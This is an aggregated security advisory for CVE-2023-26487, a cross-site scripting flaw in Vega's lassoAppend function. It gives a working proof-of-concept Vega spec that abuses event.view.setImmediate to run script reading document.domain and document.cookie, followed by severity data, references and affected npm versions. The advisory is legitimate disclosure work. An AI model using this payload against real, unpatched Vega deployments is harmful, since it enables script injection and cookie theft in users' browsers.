Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS13NW0zLXhoNzUtbXA1Nc4AAx6f
Vega has Cross-site Scripting vulnerability in `lassoAppend` function
Summary
Vega's lassoAppend
function: lassoAppend
accepts 3 arguments and internally invokes push
function on the 1st argument specifying array consisting of 2nd and 3rd arguments as push
call argument. The type of the 1st argument is supposed to be an array, but it's not enforced.
This makes it possible to specify any object with a push
function as the 1st argument, push
function can be set to any function that can be access via event.view
(no all such functions can be exploited due to invalid context or signature, but some can, e.g. console.log
).
Details
The issue is that lassoAppend
doesn't enforce proper types of its arguments:
.....
export function lassoAppend(lasso, x, y, minDist = 5) {
const last = lasso[lasso.length - 1];
// Add point to lasso if distance to last point exceed minDist or its the first point
if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {
lasso.push([x, y]);
.....
PoC
Use the following Vega snippet (depends on browser's non-built-in event.view.setImmediate
function, feel free to replace with event.view.console.log
or alike and observe the result in the browser's console)
{
"$schema": "https://vega.github.io/schema/vega/v5.json",
"width": 350,
"height": 350,
"autosize": "none",
"description": "Toggle Button",
"signals": [
{
"name": "toggle",
"value": false,
"on": [
{
"events": {"type": "click", "markname": "circle"},
"update": "toggle ? false : true"
}
]
},
{
"name": "addFilter",
"on": [
{
"events": {"type": "mousemove", "source": "window"},
"update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')"
}
]
}
],
"marks": [
{
"name": "circle",
"type": "symbol",
"zindex": 1,
"encode": {
"enter": {
"y": {"signal": "height/2"},
"angle": {"value": 0},
"size": {"value": 400},
"shape": {"value": "circle"},
"fill": {"value": "white"},
"stroke": {"value": "white"},
"strokeWidth": {"value": 2},
"cursor": {"value": "pointer"},
"tooltip": {"signal": "{Tip: 'Click to fire XSS'}"}
},
"update": {"x": {"signal": "toggle === true ? 190 : 165"}}
}
},
{
"name": "rectangle",
"type": "rect",
"zindex": 0,
"encode": {
"enter": {
"x": {"value": 152},
"y": {"value": 162.5},
"width": {"value": 50},
"height": {"value": 25},
"cornerRadius": {"value": 20}
},
"update": {
"fill": {"signal": "toggle === true ? '#006BB4' : '#939597'"}
}
}
}
]
}
Impact
This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS setImmediate
polyfill basically allows eval
-like functionality).
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13NW0zLXhoNzUtbXA1Nc4AAx6f
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 1 year ago
Updated: about 1 year ago
CVSS Score: 6.1
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Identifiers: GHSA-w5m3-xh75-mp55, CVE-2023-26487
References:
- https://github.com/vega/vega/security/advisories/GHSA-w5m3-xh75-mp55
- https://github.com/vega/vega/commit/01adb034f24727d3bb321bbbb6696a7f4cd91689
- https://github.com/vega/vega/releases/tag/v5.23.0
- https://nvd.nist.gov/vuln/detail/CVE-2023-26487
- https://github.com/advisories/GHSA-w5m3-xh75-mp55
Blast Radius: 20.8
Affected Packages
npm:vega-functions
Dependent packages: 10Dependent repositories: 2,130
Downloads: 724,217 last month
Affected Version Ranges: < 5.13.1
Fixed in: 5.13.1
All affected versions: 5.0.0, 5.0.1, 5.1.0, 5.1.1, 5.2.0, 5.3.0, 5.3.1, 5.3.2, 5.4.0, 5.4.1, 5.5.0, 5.5.1, 5.6.0, 5.7.0, 5.7.1, 5.7.2, 5.7.3, 5.8.0, 5.9.0, 5.10.0, 5.11.0, 5.12.0, 5.12.1, 5.13.0
All unaffected versions: 5.13.1, 5.13.2, 5.14.0
npm:vega
Dependent packages: 270Dependent repositories: 2,597
Downloads: 717,462 last month
Affected Version Ranges: < 5.23.0
Fixed in: 5.23.0
All affected versions: 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.4.0, 1.4.1, 1.4.2, 1.4.3, 1.5.0, 1.5.3, 1.5.4, 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.1.0, 2.1.1, 2.1.2, 2.2.0, 2.2.1, 2.2.2, 2.2.3, 2.2.4, 2.2.5, 2.2.6, 2.3.0, 2.3.1, 2.4.0, 2.4.1, 2.4.2, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.0.7, 3.0.8, 3.0.9, 3.0.10, 3.1.0, 3.2.0, 3.2.1, 3.3.0, 3.3.1, 4.0.0, 4.1.0, 4.2.0, 4.3.0, 4.4.0, 5.0.0, 5.1.0, 5.2.0, 5.3.0, 5.3.1, 5.3.2, 5.3.3, 5.3.4, 5.3.5, 5.4.0, 5.5.0, 5.5.1, 5.5.2, 5.5.3, 5.6.0, 5.7.0, 5.7.1, 5.7.2, 5.7.3, 5.8.0, 5.8.1, 5.9.0, 5.9.1, 5.9.2, 5.10.0, 5.10.1, 5.11.0, 5.11.1, 5.12.0, 5.12.1, 5.12.2, 5.12.3, 5.13.0, 5.14.0, 5.15.0, 5.16.0, 5.16.1, 5.17.0, 5.17.1, 5.17.2, 5.17.3, 5.18.0, 5.19.0, 5.19.1, 5.20.0, 5.20.1, 5.20.2, 5.21.0, 5.22.0, 5.22.1
All unaffected versions: 5.23.0, 5.24.0, 5.25.0, 5.26.0, 5.26.1, 5.27.0, 5.28.0